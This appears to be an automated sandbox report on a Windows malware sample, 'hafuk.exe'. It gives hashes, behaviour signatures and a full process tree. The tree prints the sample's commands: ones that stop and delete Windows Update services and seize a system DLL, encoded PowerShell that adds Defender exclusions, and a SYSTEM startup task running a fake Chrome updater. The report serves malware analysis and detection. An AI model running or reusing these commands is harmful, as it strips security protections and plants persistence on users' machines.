Analysis
-
max time kernel
33s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
29-08-2022 03:26
Static task
static1
Behavioral task
behavioral1
Sample
hafuk.exe
Resource
win7-20220812-en
General
-
Target
hafuk.exe
-
Size
4.3MB
-
MD5
e0ec197ba6e02af435a5230b8f4331b3
-
SHA1
7aada797f2a5f1ff58467923f47d6d31db33fc1a
-
SHA256
f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed
-
SHA512
46927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770
-
SSDEEP
98304:wEH7zDMeBfte//fxvbNOKAJmFxPVGp3X/G3DvJFvxzG99K:wEPDDBfKxvQKAJmFxPVG1/GlFv0XK
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Drops file in Drivers directory 1 IoCs
Processes:
hafuk.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts hafuk.exe -
Executes dropped EXE 1 IoCs
Processes:
updaterchr.exepid process 4496 updaterchr.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1724 takeown.exe 4612 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
hafuk.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hafuk.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1724 takeown.exe 4612 icacls.exe -
Drops file in Program Files directory 2 IoCs
Processes:
hafuk.exedescription ioc process File created C:\Program Files\Google\Chrome\updaterchr.exe hafuk.exe File opened for modification C:\Program Files\Google\Chrome\updaterchr.exe hafuk.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 3796 sc.exe 3060 sc.exe 3144 sc.exe 804 sc.exe 3488 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 51 IoCs
Processes:
powershell.exeupdaterchr.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" updaterchr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" updaterchr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" updaterchr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ updaterchr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" updaterchr.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4520 reg.exe 3672 reg.exe 2000 reg.exe 1240 reg.exe 4772 reg.exe 1052 reg.exe 4760 reg.exe 3412 reg.exe 1680 reg.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exehafuk.exepowershell.exepid process 1180 powershell.exe 1180 powershell.exe 4588 powershell.exe 4588 powershell.exe 3448 hafuk.exe 3176 powershell.exe 3176 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exetakeown.exedescription pid process Token: SeDebugPrivilege 1180 powershell.exe Token: SeShutdownPrivilege 2660 powercfg.exe Token: SeCreatePagefilePrivilege 2660 powercfg.exe Token: SeShutdownPrivilege 1264 powercfg.exe Token: SeCreatePagefilePrivilege 1264 powercfg.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeShutdownPrivilege 1676 powercfg.exe Token: SeCreatePagefilePrivilege 1676 powercfg.exe Token: SeShutdownPrivilege 4860 powercfg.exe Token: SeCreatePagefilePrivilege 4860 powercfg.exe Token: SeTakeOwnershipPrivilege 1724 takeown.exe Token: SeIncreaseQuotaPrivilege 4588 powershell.exe Token: SeSecurityPrivilege 4588 powershell.exe Token: SeTakeOwnershipPrivilege 4588 powershell.exe Token: SeLoadDriverPrivilege 4588 powershell.exe Token: SeSystemProfilePrivilege 4588 powershell.exe Token: SeSystemtimePrivilege 4588 powershell.exe Token: SeProfSingleProcessPrivilege 4588 powershell.exe Token: SeIncBasePriorityPrivilege 4588 powershell.exe Token: SeCreatePagefilePrivilege 4588 powershell.exe Token: SeBackupPrivilege 4588 powershell.exe Token: SeRestorePrivilege 4588 powershell.exe Token: SeShutdownPrivilege 4588 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeSystemEnvironmentPrivilege 4588 powershell.exe Token: SeRemoteShutdownPrivilege 4588 powershell.exe Token: SeUndockPrivilege 4588 powershell.exe Token: SeManageVolumePrivilege 4588 powershell.exe Token: 33 4588 powershell.exe Token: 34 4588 powershell.exe Token: 35 4588 powershell.exe Token: 36 4588 powershell.exe Token: SeIncreaseQuotaPrivilege 4588 powershell.exe Token: SeSecurityPrivilege 4588 powershell.exe Token: SeTakeOwnershipPrivilege 4588 powershell.exe Token: SeLoadDriverPrivilege 4588 powershell.exe Token: SeSystemProfilePrivilege 4588 powershell.exe Token: SeSystemtimePrivilege 4588 powershell.exe Token: SeProfSingleProcessPrivilege 4588 powershell.exe Token: SeIncBasePriorityPrivilege 4588 powershell.exe Token: SeCreatePagefilePrivilege 4588 powershell.exe Token: SeBackupPrivilege 4588 powershell.exe Token: SeRestorePrivilege 4588 powershell.exe Token: SeShutdownPrivilege 4588 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeSystemEnvironmentPrivilege 4588 powershell.exe Token: SeRemoteShutdownPrivilege 4588 powershell.exe Token: SeUndockPrivilege 4588 powershell.exe Token: SeManageVolumePrivilege 4588 powershell.exe Token: 33 4588 powershell.exe Token: 34 4588 powershell.exe Token: 35 4588 powershell.exe Token: 36 4588 powershell.exe Token: SeIncreaseQuotaPrivilege 4588 powershell.exe Token: SeSecurityPrivilege 4588 powershell.exe Token: SeTakeOwnershipPrivilege 4588 powershell.exe Token: SeLoadDriverPrivilege 4588 powershell.exe Token: SeSystemProfilePrivilege 4588 powershell.exe Token: SeSystemtimePrivilege 4588 powershell.exe Token: SeProfSingleProcessPrivilege 4588 powershell.exe Token: SeIncBasePriorityPrivilege 4588 powershell.exe Token: SeCreatePagefilePrivilege 4588 powershell.exe Token: SeBackupPrivilege 4588 powershell.exe Token: SeRestorePrivilege 4588 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
hafuk.execmd.execmd.execmd.exeupdaterchr.exedescription pid process target process PID 3448 wrote to memory of 1180 3448 hafuk.exe powershell.exe PID 3448 wrote to memory of 1180 3448 hafuk.exe powershell.exe PID 3448 wrote to memory of 1812 3448 hafuk.exe cmd.exe PID 3448 wrote to memory of 1812 3448 hafuk.exe cmd.exe PID 3448 wrote to memory of 1940 3448 hafuk.exe cmd.exe PID 3448 wrote to memory of 1940 3448 hafuk.exe cmd.exe PID 1812 wrote to memory of 3060 1812 cmd.exe sc.exe PID 1812 wrote to memory of 3060 1812 cmd.exe sc.exe PID 1940 wrote to memory of 2660 1940 cmd.exe powercfg.exe PID 1940 wrote to memory of 2660 1940 cmd.exe powercfg.exe PID 3448 wrote to memory of 4588 3448 hafuk.exe powershell.exe PID 3448 wrote to memory of 4588 3448 hafuk.exe powershell.exe PID 1812 wrote to memory of 3144 1812 cmd.exe sc.exe PID 1812 wrote to memory of 3144 1812 cmd.exe sc.exe PID 1940 wrote to memory of 1264 1940 cmd.exe powercfg.exe PID 1940 wrote to memory of 1264 1940 cmd.exe powercfg.exe PID 1940 wrote to memory of 1676 1940 cmd.exe powercfg.exe PID 1940 wrote to memory of 1676 1940 cmd.exe powercfg.exe PID 1812 wrote to memory of 804 1812 cmd.exe sc.exe PID 1812 wrote to memory of 804 1812 cmd.exe sc.exe PID 1940 wrote to memory of 4860 1940 cmd.exe powercfg.exe PID 1940 wrote to memory of 4860 1940 cmd.exe powercfg.exe PID 1812 wrote to memory of 3488 1812 cmd.exe sc.exe PID 1812 wrote to memory of 3488 1812 cmd.exe sc.exe PID 1812 wrote to memory of 3796 1812 cmd.exe sc.exe PID 1812 wrote to memory of 3796 1812 cmd.exe sc.exe PID 1812 wrote to memory of 4760 1812 cmd.exe reg.exe PID 1812 wrote to memory of 4760 1812 cmd.exe reg.exe PID 1812 wrote to memory of 3412 1812 cmd.exe reg.exe PID 1812 wrote to memory of 3412 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1680 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1680 1812 cmd.exe reg.exe PID 1812 wrote to memory of 3672 1812 cmd.exe reg.exe PID 1812 wrote to memory of 3672 1812 cmd.exe reg.exe PID 1812 wrote to memory of 4520 1812 cmd.exe reg.exe PID 1812 wrote to memory of 4520 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1724 1812 cmd.exe takeown.exe PID 1812 wrote to memory of 1724 1812 cmd.exe takeown.exe PID 1812 wrote to memory of 4612 1812 cmd.exe icacls.exe PID 1812 wrote to memory of 4612 1812 cmd.exe icacls.exe PID 3448 wrote to memory of 2044 3448 hafuk.exe cmd.exe PID 3448 wrote to memory of 2044 3448 hafuk.exe cmd.exe PID 2044 wrote to memory of 1992 2044 cmd.exe schtasks.exe PID 2044 wrote to memory of 1992 2044 cmd.exe schtasks.exe PID 4496 wrote to memory of 3176 4496 updaterchr.exe powershell.exe PID 4496 wrote to memory of 3176 4496 updaterchr.exe powershell.exe PID 1812 wrote to memory of 2000 1812 cmd.exe reg.exe PID 1812 wrote to memory of 2000 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1240 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1240 1812 cmd.exe reg.exe PID 1812 wrote to memory of 4772 1812 cmd.exe reg.exe PID 1812 wrote to memory of 4772 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1052 1812 cmd.exe reg.exe PID 1812 wrote to memory of 1052 1812 cmd.exe reg.exe PID 1812 wrote to memory of 2208 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 2208 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 1400 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 1400 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 1444 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 1444 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 1492 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 1492 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 2104 1812 cmd.exe schtasks.exe PID 1812 wrote to memory of 2104 1812 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\hafuk.exe"C:\Users\Admin\AppData\Local\Temp\hafuk.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3060 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3144 -
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:804 -
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3488 -
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3796 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
PID:4760 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
PID:3412 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
PID:1680 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
PID:3672 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
PID:4520 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1724 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4612 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
PID:2000 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1240 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:4772 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
PID:1052 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵PID:2208
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵PID:1400
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵PID:1444
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵PID:1492
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵PID:2104
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵PID:2024
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:4448
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAegAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgBjAGgAcgAuAGUAeABlACIAJwApACAAPAAjAGgAdAB5AHYAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBzAGEAeAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAawAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAEcATgBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAYQBxACMAPgA7AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4588 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineGNC"2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineGNC"3⤵PID:1992
-
C:\Program Files\Google\Chrome\updaterchr.exe"C:\Program Files\Google\Chrome\updaterchr.exe"1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbABvACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwB3AGoAeAAjAD4AIABAACgAIAA8ACMAdwBxACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBpAG8AZAB5ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwApACAAPAAjAGgAYQBkAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBmAHcAIwA+AA=="2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3176
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.3MB
MD5e0ec197ba6e02af435a5230b8f4331b3
SHA17aada797f2a5f1ff58467923f47d6d31db33fc1a
SHA256f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed
SHA51246927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770
-
Filesize
4.3MB
MD5e0ec197ba6e02af435a5230b8f4331b3
SHA17aada797f2a5f1ff58467923f47d6d31db33fc1a
SHA256f96299c94417aea9f7f1d612cb84635a5c2f7c461e86da1febb052b4a2ef32ed
SHA51246927c14cf945ee013731cc19671a1e183c44eb62a0f3e16ce9323bee26d92818aa8271cef7ffd781e51c1c583f162f438c8ea8d6902fdb10d807f7b42032770
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
